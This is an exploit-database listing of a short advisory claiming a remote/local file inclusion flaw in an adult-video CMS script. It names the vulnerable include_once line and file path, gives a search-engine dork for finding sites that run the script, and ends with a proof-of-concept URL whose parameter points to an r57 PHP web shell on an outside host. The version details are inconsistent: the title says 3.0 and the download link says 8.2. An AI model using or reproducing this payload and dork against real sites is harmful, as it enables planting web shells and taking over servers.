Share
## https://sploitus.com/exploit?id=PACKETSTORM:173103
====================================================================================================================================
| # Title : Adult Video Script 3.0 RFI /LFI Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Download : https://update.avscms.com/files/avscms-8.2-full.zip |
| # Dork : Powered by AVSCMS |
====================================================================================================================================
P0C :
[+] Dorking İn Google Or Other Search Enggine.
[+] R/L File Inclusion :
Line : 20 = include_once ('./lang/'.$lang_include);
Function : include_once
Variables :$lang_include
C:\web\www\upload\siteadmin\editor_files\image.php
[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
=======================================================================================================================================